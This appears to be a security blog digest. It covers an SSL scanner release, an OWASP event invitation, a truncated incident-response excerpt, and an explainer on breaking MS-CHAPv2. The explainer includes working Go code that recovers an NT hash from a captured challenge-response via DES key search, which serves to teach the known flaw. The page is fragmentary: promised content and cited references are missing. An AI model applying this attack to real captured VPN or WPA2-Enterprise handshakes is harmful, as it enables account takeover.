Interesting Reads - Week 12 / 2013


Food for thought 



I have updated my little TLS/SSL scanner "SSL Audit" to version 0.8. The changes are small; the tool is still built on its own rudimentary SSL engine, so the ciphersuites and protocol versions it can probe are not limited to those available in OpenSSL or NSS.

By the way, I am still a little bit proud of the SSL stack fingerprinting feature. I haven't updated it recently, but it still seems to work nicely. Try it out and let me know how it does, especially if you have access to less well-known SSL stacks.

Changes

  • Added support for the TLS 1.2 Camellia ciphersuites;
  • Sped up SSLv2 enumeration;
  • Added the complete range of ARIA ciphersuites (http://tools.ietf.org/html/draft-nsri-tls-aria-00).
SSL Audit v0.8

Download



I would like to invite you to this year's OWASP BeNeLux event. I won't give a talk this year, but as a member of the OWASP BeNeLux Program Committee I happily invite you:

Quick Facts

Agenda

The agenda is a sound mix of application security, forensics and risk management and represents the current security landscape at large rather well: building security into applications in enterprises, managing application-level vulnerabilities, and source code review at scale. It also has two innovative talks, one on exploit mitigation and one on sandboxing JavaScript.

The talk about JavaScript sandboxing (JSand) especially has my attention, as it represents an interesting challenge that is hard to get right given the context within which JavaScript operates. It claims to be complete, to require no browser modifications and to be enforced client-side. The talk will also be given at ACSAC 2012.

Venue

Both the training day and the conference day take place at:
KU Leuven (University of Leuven)
iMinds-DistriNet Research Group
Celestijnenlaan 200A
B-3001 Heverlee
How to get there: http://distrinet.cs.kuleuven.be/about/route/
Hotel details: https://www.owasp.org/index.php?title=BeNeLux_OWASP_Day_2012#tab=Venue



[Update: added "10 Common Mistakes of Incident Responders" at the bottom]

The following post breaks a major rule I adhere to when blogging: a post shall not have more than 10% content that is not authored by myself. The content of this post resonated so well with me, however, that I decided to make an exception.

The following is attributed to Ali-Reza Anghaie, a.k.a. Packetknife.com. For those of you in similar situations I can only warmly recommend considering and following the advice. The emphasis is mine.

[Start of Excerpt] 
Ali-Reza Anghaie
I've had a fairly long and quite unintentional career in InfoSec, ranging from Academic to Entertainment to Defense. Along the way a lot of mistakes were made or observed. This post marks the first of many installments to share lack of foresight turned into a graying-face ghillie.

I'm not quite sure of the right format, but I'm going with a Top Twenty, so I'll keep to the biggest pain points as I see them.


A post in the "straight to the meat" category:

There was a talk at DEF CON 20 entitled "Defeating PPTP VPNs and WPA2-Enterprise with MS-CHAPv2" by Moxie Marlinspike and David Hulton. The talk announced a tool that reduces the security of MS-CHAPv2 to the strength of a single DES key: the three DES operations in the response all encrypt the same 8-byte challenge, the third key has only 16 unknown bits, and the remaining two 56-bit keys can be checked in one exhaustive DES key search.

This post gives a quick rundown, with references, of what you need to know. Enjoy - Thierry
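To make the "single DES" reduction concrete, here is an added worked example (my own code, not the talk's tool and not part of the original post): the MS-CHAPv2 challenge/response of RFC 2759 implemented with Go's standard crypto/des and crypto/sha1, followed by the two parts of the attack: the 2^16 brute force of the third key, and the one-pass search that compares each candidate DES key against both remaining ciphertexts. The NT hash, the two challenges and the user name are constructed test data, and the search runs over a 256-key window chosen to contain K1 and K2, since the full 2^56 pass is what the talk's FPGA service exists for.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
)

// expandKey spreads a 7-byte MS-CHAPv2 key fragment over the 8 bytes DES
// expects: every 7 key bits land in the high bits of one byte and the low
// (parity) bit is cleared, as in the DesEncrypt helper of RFC 2759.
func expandKey(k7 []byte) []byte {
	k := make([]byte, 8)
	k[0] = k7[0] & 0xFE
	k[1] = ((k7[0] << 7) | (k7[1] >> 1)) & 0xFE
	k[2] = ((k7[1] << 6) | (k7[2] >> 2)) & 0xFE
	k[3] = ((k7[2] << 5) | (k7[3] >> 3)) & 0xFE
	k[4] = ((k7[3] << 4) | (k7[4] >> 4)) & 0xFE
	k[5] = ((k7[4] << 3) | (k7[5] >> 5)) & 0xFE
	k[6] = ((k7[5] << 2) | (k7[6] >> 6)) & 0xFE
	k[7] = (k7[6] << 1) & 0xFE
	return k
}

// desEncrypt is RFC 2759 DesEncrypt: one DES block under a 7-byte key.
func desEncrypt(k7, block []byte) []byte {
	c, err := des.NewCipher(expandKey(k7))
	if err != nil {
		panic(err) // only a wrong key length can get here
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// challengeHash is RFC 2759 ChallengeHash: the 8-byte value both sides feed
// to DES, derived from the two 16-byte challenges and the user name, all of
// which an eavesdropper sees on the wire.
func challengeHash(peerChallenge, authChallenge []byte, userName string) []byte {
	h := sha1.New()
	h.Write(peerChallenge)
	h.Write(authChallenge)
	h.Write([]byte(userName))
	return h.Sum(nil)[:8]
}

// challengeResponse is RFC 2759 ChallengeResponse: the 16-byte NT hash is
// padded with 5 zero bytes, cut into three 7-byte DES keys, and each key
// encrypts the same challenge. Only the hash is needed, never the password.
func challengeResponse(challenge, ntHash []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, ntHash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desEncrypt(padded[i:i+7], challenge)...)
	}
	return resp
}

// recoverK3 brute-forces the third key. Five of its seven bytes are the zero
// padding, so 2^16 trial encryptions recover NT-hash bytes 14 and 15.
func recoverK3(challenge, response []byte) ([]byte, bool) {
	k7 := make([]byte, 7)
	for i := 0; i < 1<<16; i++ {
		binary.BigEndian.PutUint16(k7, uint16(i))
		if bytes.Equal(desEncrypt(k7, challenge), response[16:24]) {
			return append([]byte(nil), k7[:2]...), true
		}
	}
	return nil, false
}

// searchKeySpace is the single-DES search for K1 and K2. Both keys encrypt
// the same challenge, so one trial encryption per candidate is compared
// against both ciphertexts and one pass over the 56-bit space yields both.
// The talk's FPGA service walks all 2^56 keys; callers here pass a
// [start, start+count) window small enough to run on a laptop.
func searchKeySpace(challenge, response []byte, start, count uint64) (k1, k2 []byte, ok bool) {
	var buf [8]byte
	for k := start; k < start+count; k++ {
		binary.BigEndian.PutUint64(buf[:], k)
		cand := buf[1:] // 56-bit key in the low 7 bytes
		ct := desEncrypt(cand, challenge)
		if bytes.Equal(ct, response[0:8]) {
			k1 = append([]byte(nil), cand...)
		} else if bytes.Equal(ct, response[8:16]) {
			k2 = append([]byte(nil), cand...)
		}
		if k1 != nil && k2 != nil {
			return k1, k2, true
		}
	}
	return k1, k2, false
}

// recoverNTHash reassembles the 16-byte NT hash from the three fragments.
func recoverNTHash(k1, k2, k3 []byte) []byte {
	return append(append(append([]byte(nil), k1...), k2...), k3...)
}

func main() {
	// Constructed NT hash (a real one is MD4 of the UTF-16LE password); K1 and
	// K2 are chosen numerically adjacent so the demo window holds both.
	ntHash := []byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66,
		0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x77, 0x88, 0x99}
	peer := bytes.Repeat([]byte{0x01}, 16) // constructed challenges
	auth := bytes.Repeat([]byte{0x02}, 16)
	ch := challengeHash(peer, auth, "alice")
	resp := challengeResponse(ch, ntHash) // what the client sends
	k3, _ := recoverK3(ch, resp)
	k1, k2, _ := searchKeySpace(ch, resp, 0x00112233445500, 0x100)
	rec := recoverNTHash(k1, k2, k3)
	fmt.Printf("recovered NT hash %x, matches: %v\n", rec, bytes.Equal(rec, ntHash))
	fmt.Printf("hash alone reproduces the response: %v\n",
		bytes.Equal(challengeResponse(ch, rec), resp))
}
```

The last line of main is the practical lesson: what the attack recovers is the NT hash, and the hash alone is sufficient to compute valid MS-CHAPv2 responses, so the password never has to be cracked.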




History:
1999 - Bruce Schneier and Mudge document the vulnerability [2]
2011 - Sogeti releases a proof of concept performing the same attack against MS-CHAPv2 [4]
2012 - DEF CON talk detailing the flaw and release of a SaaS cracking service that recovers the key within 23 hours [3]